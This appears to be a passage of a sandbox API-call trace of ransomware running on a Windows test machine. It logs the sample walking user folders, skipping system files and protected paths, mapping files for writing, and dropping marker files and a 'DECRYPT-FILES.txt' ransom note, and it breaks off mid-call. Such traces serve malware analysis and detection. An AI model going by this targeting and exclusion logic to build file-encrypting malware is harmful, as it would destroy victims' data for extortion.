[0184.660] lstrcmpiW (lpString1="XG1ODMqHamQ.gif.APnd25D", lpString2="ntuser.dat") returned 1 [0184.660] lstrcmpiW (lpString1="XG1ODMqHamQ.gif.APnd25D", lpString2="iconcache.db") returned 1 [0184.660] lstrcmpiW (lpString1="XG1ODMqHamQ.gif.APnd25D", lpString2="bootsect.bak") returned 1 [0184.660] lstrcmpiW (lpString1="XG1ODMqHamQ.gif.APnd25D", lpString2="ntuser.dat.log") returned 1 [0184.660] lstrcmpiW (lpString1="XG1ODMqHamQ.gif.APnd25D", lpString2="thumbs.db") returned 1 [0184.660] lstrcmpiW (lpString1="XG1ODMqHamQ.gif.APnd25D", lpString2="Bootfont.bin") returned 1 [0184.661] lstrlenW (lpString="XG1ODMqHamQ.gif.APnd25D") returned 23 [0184.661] lstrcmpiW (lpString1="APnd25D", lpString2="lnk") returned -1 [0184.661] lstrcmpiW (lpString1="APnd25D", lpString2="exe") returned -1 [0184.661] lstrcmpiW (lpString1="APnd25D", lpString2="sys") returned -1 [0184.661] lstrcmpiW (lpString1="APnd25D", lpString2="dll") returned -1 [0184.661] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0184.661] lstrlenW (lpString="XG1ODMqHamQ.gif.APnd25D") returned 23 [0184.661] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0184.661] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="XG1ODMqHamQ.gif.APnd25D" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\XG1ODMqHamQ.gif.APnd25D") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\XG1ODMqHamQ.gif.APnd25D" [0184.661] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.661] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\XG1ODMqHamQ.gif.APnd25D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\xg1odmqhamq.gif.apnd25d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0184.661] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=6234) returned 1 [0184.661] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0184.661] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.662] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.662] CloseHandle (hObject=0x268) returned 1 [0184.662] CloseHandle (hObject=0x264) returned 1 [0184.662] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.662] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9e5d0c70, ftCreationTime.dwHighDateTime=0x1d4d3b0, ftLastAccessTime.dwLowDateTime=0x2295a730, ftLastAccessTime.dwHighDateTime=0x1d4c76e, ftLastWriteTime.dwLowDateTime=0xad6edb00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x124a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="xw7Ljtxw.gif.Q5Ty", cAlternateFileName="XW7LJT~1.Q5T")) returned 1 [0184.663] lstrcmpiW (lpString1="xw7Ljtxw.gif.Q5Ty", lpString2="DECRYPT-FILES.txt") returned 1 [0184.663] lstrcmpiW (lpString1="xw7Ljtxw.gif.Q5Ty", lpString2="autorun.inf") returned 1 [0184.663] lstrcmpiW (lpString1="xw7Ljtxw.gif.Q5Ty", lpString2="boot.ini") returned 1 [0184.663] lstrcmpiW (lpString1="xw7Ljtxw.gif.Q5Ty", lpString2="desktop.ini") returned 1 [0184.663] lstrcmpiW (lpString1="xw7Ljtxw.gif.Q5Ty", lpString2="ntuser.dat") returned 1 [0184.663] lstrcmpiW (lpString1="xw7Ljtxw.gif.Q5Ty", lpString2="iconcache.db") returned 1 [0184.663] lstrcmpiW (lpString1="xw7Ljtxw.gif.Q5Ty", lpString2="bootsect.bak") returned 1 [0184.663] lstrcmpiW (lpString1="xw7Ljtxw.gif.Q5Ty", lpString2="ntuser.dat.log") returned 1 [0184.663] lstrcmpiW (lpString1="xw7Ljtxw.gif.Q5Ty", lpString2="thumbs.db") returned 1 [0184.663] lstrcmpiW (lpString1="xw7Ljtxw.gif.Q5Ty", lpString2="Bootfont.bin") returned 1 [0184.663] lstrlenW (lpString="xw7Ljtxw.gif.Q5Ty") returned 17 [0184.663] lstrcmpiW (lpString1="Q5Ty", lpString2="lnk") returned 1 [0184.663] lstrcmpiW (lpString1="Q5Ty", lpString2="exe") returned 1 [0184.663] lstrcmpiW (lpString1="Q5Ty", lpString2="sys") returned -1 [0184.663] lstrcmpiW (lpString1="Q5Ty", lpString2="dll") returned 1 [0184.663] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0184.663] lstrlenW (lpString="xw7Ljtxw.gif.Q5Ty") returned 17 [0184.663] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0184.663] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="xw7Ljtxw.gif.Q5Ty" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xw7Ljtxw.gif.Q5Ty") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xw7Ljtxw.gif.Q5Ty" [0184.663] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.663] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xw7Ljtxw.gif.Q5Ty" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\xw7ljtxw.gif.q5ty"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0184.664] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=74913) returned 1 [0184.664] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0184.664] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.664] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.664] CloseHandle (hObject=0x268) returned 1 [0184.665] CloseHandle (hObject=0x264) returned 1 [0184.665] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.665] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x97d69c00, ftCreationTime.dwHighDateTime=0x1d4d4f4, ftLastAccessTime.dwLowDateTime=0x937c7550, ftLastAccessTime.dwHighDateTime=0x1d4d362, ftLastWriteTime.dwLowDateTime=0xad739dc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1764f, dwReserved0=0x0, dwReserved1=0x0, cFileName="zrDg.rtf.Rfjfpy", cAlternateFileName="ZRDGRT~1.RFJ")) returned 1 [0184.665] lstrcmpiW (lpString1="zrDg.rtf.Rfjfpy", lpString2="DECRYPT-FILES.txt") returned 1 [0184.665] lstrcmpiW (lpString1="zrDg.rtf.Rfjfpy", lpString2="autorun.inf") returned 1 [0184.665] lstrcmpiW (lpString1="zrDg.rtf.Rfjfpy", lpString2="boot.ini") returned 1 [0184.665] lstrcmpiW (lpString1="zrDg.rtf.Rfjfpy", lpString2="desktop.ini") returned 1 [0184.665] lstrcmpiW (lpString1="zrDg.rtf.Rfjfpy", lpString2="ntuser.dat") returned 1 [0184.665] lstrcmpiW (lpString1="zrDg.rtf.Rfjfpy", lpString2="iconcache.db") returned 1 [0184.665] lstrcmpiW (lpString1="zrDg.rtf.Rfjfpy", lpString2="bootsect.bak") returned 1 [0184.665] lstrcmpiW (lpString1="zrDg.rtf.Rfjfpy", lpString2="ntuser.dat.log") returned 1 [0184.665] lstrcmpiW (lpString1="zrDg.rtf.Rfjfpy", lpString2="thumbs.db") returned 1 [0184.665] lstrcmpiW (lpString1="zrDg.rtf.Rfjfpy", lpString2="Bootfont.bin") returned 1 [0184.665] lstrlenW (lpString="zrDg.rtf.Rfjfpy") returned 15 [0184.665] lstrcmpiW (lpString1="Rfjfpy", lpString2="lnk") returned 1 [0184.665] lstrcmpiW (lpString1="Rfjfpy", lpString2="exe") returned 1 [0184.665] lstrcmpiW (lpString1="Rfjfpy", lpString2="sys") returned -1 [0184.665] lstrcmpiW (lpString1="Rfjfpy", lpString2="dll") returned 1 [0184.665] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0184.665] lstrlenW (lpString="zrDg.rtf.Rfjfpy") returned 15 [0184.665] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0184.665] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="zrDg.rtf.Rfjfpy" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\zrDg.rtf.Rfjfpy") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\zrDg.rtf.Rfjfpy" [0184.665] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.666] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\zrDg.rtf.Rfjfpy" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\zrdg.rtf.rfjfpy"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0184.666] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=95823) returned 1 [0184.666] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0184.666] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.667] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.667] CloseHandle (hObject=0x268) returned 1 [0184.667] CloseHandle (hObject=0x264) returned 1 [0184.667] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.667] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x97d69c00, ftCreationTime.dwHighDateTime=0x1d4d4f4, ftLastAccessTime.dwLowDateTime=0x937c7550, ftLastAccessTime.dwHighDateTime=0x1d4d362, ftLastWriteTime.dwLowDateTime=0xad739dc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1764f, dwReserved0=0x0, dwReserved1=0x0, cFileName="zrDg.rtf.Rfjfpy", cAlternateFileName="ZRDGRT~1.RFJ")) returned 0 [0184.667] FindClose (in: hFindFile=0x4798b8 | out: hFindFile=0x4798b8) returned 1 [0184.668] CloseHandle (hObject=0x25c) returned 1 [0184.668] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xad75ff20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xad75ff20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming\\", cAlternateFileName="")) returned 0 [0184.668] FindClose (in: hFindFile=0x479878 | out: hFindFile=0x479878) returned 1 [0184.668] CloseHandle (hObject=0x254) returned 1 [0184.668] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0184.668] lstrcmpW (lpString1="Application Data", lpString2=".") returned 1 [0184.668] lstrcmpW (lpString1="Application Data", lpString2="..") returned 1 [0184.668] lstrcatW (in: lpString1="Application Data", lpString2="\\" | out: lpString1="Application Data\\") returned="Application Data\\" [0184.668] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Application Data\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\" [0184.668] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\", lpSrch="\\Program Files") returned 0x0 [0184.668] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\", lpSrch=":\\Windows") returned 0x0 [0184.668] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\", lpSrch="\\Games\\") returned 0x0 [0184.668] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\", lpSrch="\\Tor Browser\\") returned 0x0 [0184.668] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\", lpSrch="\\ProgramData\\") returned 0x0 [0184.668] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0184.668] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0184.668] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0184.668] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\", lpSrch="\\All Users") returned 0x0 [0184.668] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\", lpSrch="\\IETldCache\\") returned 0x0 [0184.668] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\", lpSrch="\\Local Settings\\") returned 0x0 [0184.668] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\", lpSrch="\\AppData\\Local") returned 0x0 [0184.669] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\", lpSrch="AhnLab") returned 0x0 [0184.669] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0184.669] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\") returned 47 [0184.669] lstrlenW (lpString="0a16c9.tmp") returned 10 [0184.669] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\\\0a16c9.tmp") returned 58 [0184.669] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x254 [0184.669] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\") returned 47 [0184.669] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0184.669] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\\\DECRYPT-FILES.txt") returned 65 [0184.669] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0184.669] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\") returned 47 [0184.669] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*" [0184.670] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xad75ff20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xad75ff20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming\\", cAlternateFileName="苟眔酯ͯ")) returned 0xffffffff [0184.670] CloseHandle (hObject=0x254) returned 1 [0184.670] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xad8dcce0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xad8dcce0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0184.670] lstrcmpW (lpString1="Contacts", lpString2=".") returned 1 [0184.670] lstrcmpW (lpString1="Contacts", lpString2="..") returned 1 [0184.670] lstrcatW (in: lpString1="Contacts", lpString2="\\" | out: lpString1="Contacts\\") returned="Contacts\\" [0184.670] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Contacts\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0184.670] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="\\Program Files") returned 0x0 [0184.670] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch=":\\Windows") returned 0x0 [0184.670] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="\\Games\\") returned 0x0 [0184.670] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="\\Tor Browser\\") returned 0x0 [0184.670] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="\\ProgramData\\") returned 0x0 [0184.670] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0184.670] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0184.670] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0184.670] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="\\All Users") returned 0x0 [0184.670] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="\\IETldCache\\") returned 0x0 [0184.670] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="\\Local Settings\\") returned 0x0 [0184.670] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="\\AppData\\Local") returned 0x0 [0184.670] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="AhnLab") returned 0x0 [0184.670] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0184.670] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned 39 [0184.670] lstrlenW (lpString="0a16c9.tmp") returned 10 [0184.670] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\\\0a16c9.tmp") returned 50 [0184.671] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x254 [0184.671] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned 39 [0184.671] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0184.671] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\\\DECRYPT-FILES.txt") returned 57 [0184.671] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0184.671] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned 39 [0184.671] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*" [0184.671] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf0c7a3a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf0c7a3a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479878 [0184.671] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0184.671] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf0c7a3a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf0c7a3a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.671] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0184.671] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0184.671] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0c7a3a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf0c7a3a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf0c7a3a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0184.671] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0184.671] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0184.671] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0184.672] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0184.672] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0184.672] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0184.672] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0184.672] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0184.672] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0184.672] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0184.672] lstrlenW (lpString="0a16c9.tmp") returned 10 [0184.672] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0184.672] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0184.672] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0184.672] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0184.672] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned 39 [0184.672] lstrlenW (lpString="0a16c9.tmp") returned 10 [0184.672] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0184.672] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\0a16c9.tmp" [0184.672] VirtualAlloc (lpAddress=0x0, dwSize=0x28, 